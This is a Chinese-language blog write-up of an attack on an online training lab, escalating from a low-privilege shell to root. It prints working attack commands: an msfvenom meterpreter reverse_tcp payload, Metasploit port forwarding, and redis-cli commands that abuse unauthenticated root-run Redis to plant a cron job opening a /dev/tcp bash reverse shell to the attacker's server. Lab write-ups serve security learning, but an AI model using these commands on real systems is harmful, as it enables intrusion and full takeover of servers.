美文网首页
linux另类提权之打靶归来

linux另类提权之打靶归来

作者: 重生信息安全 | 来源:发表于2020-03-06 13:05 被阅读0次
    本文作者 : 重生信安 - 鲨鱼

    ​前言:

    渗透某安全培训学校在线靶场。不要听见靶场就关闭了此文,客官往下看。

    0x01 开端

    打开此靶机各种琳琅满目的漏洞让我眼花缭乱,这里我选择一种直击要害的漏洞作为开端,R...C....E...

    话不多说直接弹。

    收到shell权限较低....

    发现shell没有任何权限,无法对文件进行更改和写入。只能对上传目录有写入权限 find -user www。

    上传目录通过web访问是没有权限访问的,访问uploads目录会直接跳转404页面。其实上传上PHP马也没什么卵用。

    内核打了一圈也没办法提权,像我这种小白是没得0day的。

    0x02 收集

    没办法不能走内核提权,就开始收集信息看看能不能进行环境变量,SUID,符号链接等提权。

    当我执行ps -fu root 命令时.眼前一亮,root权限运行的redis卧槽有搞头,不过不能外连。

    0x03 开干

    现在需要把6379端口转发出来,我决定用msf进行端口转发,好,我们来操作一把。

    生成linux远控

    msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=8000 -f elf >shell.elf

    但是问题又来了,目前的权限不能执行wget等远程下载操作,这里我们通过上传漏洞将elf文件上传到服务器。

    我们CD到上传目录准备执行远控。

    这里将msf设置好监听来接收shell。

    接下来进行端口转发。

    0x04 利用

    nmap -A -p 6699 -script redis-info127.0.0.1 对其进行探测得知存在未授权。

    ./redis-cli -h 127.0.0.1 -p 6699

    我不准备写ssh的公私钥了,直接进行弹shell。

    我们现在VPS上使用nc监听4445端口。

    redis执行:

    set xxx "\n\n*/1 * * * */bin/bash -i>&/dev/tcp/ip/44440>&1\n\n"

    config set dir /var/spool/cron

    config setdbfilename root

    save

    root权限到手。

    还望大佬们多多指点。

    相关文章

      网友评论

          本文标题:linux另类提权之打靶归来

          本文链接:https://www.haomeiwen.com/subject/baibrhtx.html